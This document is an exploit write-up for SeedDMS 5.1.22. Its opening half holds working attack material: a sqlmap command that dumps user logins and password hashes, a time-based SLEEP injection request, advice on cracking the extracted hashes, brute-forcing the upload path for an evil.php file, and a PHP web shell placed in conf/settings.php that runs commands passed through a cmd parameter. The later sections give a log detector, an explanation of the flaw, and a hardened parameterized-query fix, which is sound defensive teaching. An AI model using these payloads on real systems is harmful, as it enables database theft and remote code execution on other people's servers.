SeedDMS 5.1.22 Exploit

Using sqlmap or manual payloads, an attacker can enumerate the database:

sqlmap -u "http://target/seeddms51/op/op.RemoveDocument.php?documentid=1" \
  --technique=T --dbms=mysql --level=3 --risk=2 \
  -D seeddms_db -T tblUsers -C login,passwd --dump

A manual payload (time-based):

GET /seeddms51/op/op.RemoveDocument.php?documentid=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a) HTTP/1.1
Host: target

If the response is delayed by 5 seconds, the vulnerability exists.

Extracted data example:

| login | passwd (MD5)                                |
|-------|---------------------------------------------|
| admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| user1 | 7c6a180b36896a0a8c02787eeafb0e4c            |

Once the attacker obtains the admin credentials (the hash cracked with John the Ripper or Hashcat), they gain full access to the DMS.


SeedDMS stores uploaded files in:

/data/<folderid>/<documentid>/<version>/<filename>

Without prior documents, the system may assign a new document ID. The exact path can be brute-forced or inferred by attempting to access:

http://192.168.1.100/seeddms51/data/1000/1/1/evil.php

(Iterate over 1000, 1001, and so on.)

Alternatively, check for predictable patterns: data/temp/ or data/cache/.

Payload written into conf/settings.php through the extraPath setting:

$extraPath = '"; system($_GET["cmd"]); // ';

GET /seeddms51/conf/settings.php?cmd=id HTTP/1.1

Response:

uid=33(www-data) gid=33(www-data) groups=33(www-data)
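Both attack paths on this page leave distinctive traces in the web server access log: a non-numeric documentid/folderid carrying a time-delay function on the Remove* endpoints, a direct request for a .php file below /data/, and a cmd parameter sent to conf/settings.php. The following detector is an added example written for this page, not SeedDMS code; the log lines are constructed samples in Apache combined-log shape, and the path and parameter names are taken from the requests shown above.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote_plus

# Constructed sample access log lines (Apache combined-style, shortened);
# not real traffic from any host. Lines 1, 3 and 4 mirror the request shapes
# shown on this page; lines 2 and 5 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /seeddms51/op/op.RemoveDocument.php?documentid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(5)))a) HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /seeddms51/op/op.RemoveFolder.php?folderid=7 HTTP/1.1" 302 0
10.0.0.9 - - [01/Jan/2024:10:01:15 +0000] "GET /seeddms51/data/1000/1/1/evil.php HTTP/1.1" 200 88
10.0.0.9 - - [01/Jan/2024:10:01:20 +0000] "GET /seeddms51/conf/settings.php?cmd=id HTTP/1.1" 200 61
10.0.0.12 - - [01/Jan/2024:10:02:00 +0000] "GET /seeddms51/out/out.ViewDocument.php?documentid=42 HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# Delay functions used by time-based blind SQLi on common DBMSs.
TIME_FUNC_RE = re.compile(r'\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\b', re.I)
ID_PARAMS = ("documentid", "folderid")


def find_indicators(line):
    """Return a list of (kind, where, value) tuples for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlparse(m.group("target"))
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    for name in ID_PARAMS:
        for value in params.get(name, []):
            # parse_qs already decoded once; decode again to catch
            # double-encoded payloads, then require a pure integer.
            value = unquote_plus(value)
            if not value.isdigit():
                kind = "time-based-sqli" if TIME_FUNC_RE.search(value) else "non-numeric-id"
                findings.append((kind, name, value))
    # PHP files should never be served from the document store.
    if re.search(r'/data/.*\.php$', url.path, re.I):
        findings.append(("php-under-data", url.path, ""))
    # settings.php is a configuration file; it takes no cmd parameter.
    if url.path.endswith("/conf/settings.php") and "cmd" in params:
        findings.append(("settings-cmd-param", "cmd", params["cmd"][0]))
    return findings


def scan(log_text):
    """Scan a whole log; return one record per line that has findings."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        findings = find_indicators(line)
        if m and findings:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "findings": findings})
    return hits


def hits_per_ip(hits):
    """Count indicators per source address, to prioritise triage."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + len(h["findings"])
    return counts


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h["ip"], h["ts"], h["findings"])
    print(hits_per_ip(scan(SAMPLE_LOG)))
```

Run against the sample, the scanner flags three of the five lines and attributes two indicators to 10.0.0.9. The "non-numeric-id" kind is deliberately broad: any documentid or folderid that is not a plain integer is abnormal for this application, so it catches Boolean-based probes that carry no delay function.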

The most dangerous vulnerability in SeedDMS 5.1.22 is a time-based blind SQL injection in the op/op.RemoveDocument.php and op/op.RemoveFolder.php endpoints. It arises because the user-supplied documentid or folderid parameter is concatenated directly into SQL queries, without sanitization or parameterized queries.

Specifically, the (simplified) code from op.RemoveDocument.php:

$documentid = (int) $_GET['documentid']; // Cast to int, but the cast value is never used below
$query = "SELECT * FROM `tblDocuments` WHERE `id` = " . $_GET['documentid']; // Raw parameter concatenated into SQL

Attackers can bypass the (int) cast (the query uses the raw parameter, not the cast value) using SQL comment characters or encoding tricks, leading to classic Boolean- or time-based injection.
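To make the defect concrete, here is the same pattern reproduced in Python against an in-memory SQLite table, with the hardened form beside it. This is an added example, not SeedDMS code: the table name tblDocuments comes from the page, the column and row contents are constructed, and the "1 OR 1=1" input is only a demonstration value. In the PHP original the equivalent fix is to use the cast $documentid (or a prepared statement) in the query instead of the raw $_GET value.

```python
import re
import sqlite3


def make_db():
    """Constructed sample table standing in for SeedDMS's tblDocuments."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblDocuments (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO tblDocuments VALUES (?, ?)",
        [(1, "handbook.pdf"), (2, "budget.xlsx"), (3, "roadmap.docx")],
    )
    return conn


def lookup_vulnerable(conn, documentid):
    # Mirrors the page's PHP snippet: the raw request value is concatenated
    # into the SQL text, so its contents become part of the query.
    query = "SELECT id, name FROM tblDocuments WHERE id = " + documentid
    return conn.execute(query).fetchall()


def parse_document_id(raw):
    # Strict allow-list validation: only an unsigned decimal integer of
    # reasonable length is accepted; anything else is rejected outright.
    if not isinstance(raw, str) or not re.fullmatch(r"[0-9]{1,10}", raw):
        raise ValueError("documentid must be a positive integer")
    return int(raw)


def lookup_hardened(conn, raw_documentid):
    # Validate first, then bind the value as a parameter; the database
    # driver never interprets it as SQL.
    documentid = parse_document_id(raw_documentid)
    return conn.execute(
        "SELECT id, name FROM tblDocuments WHERE id = ?", (documentid,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, normal input:", lookup_vulnerable(conn, "1"))
    print("vulnerable, hostile input:", lookup_vulnerable(conn, "1 OR 1=1"))
    print("hardened, normal input:", lookup_hardened(conn, "1"))
    try:
        lookup_hardened(conn, "1 OR 1=1")
    except ValueError as exc:
        print("hardened, hostile input rejected:", exc)
```

With the concatenated query, the hostile input returns every row; with validation plus a bound parameter, it is rejected before any SQL runs. Rejecting rather than silently truncating also gives the application a clear event to log, which is what the detection rule for non-numeric IDs relies on.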
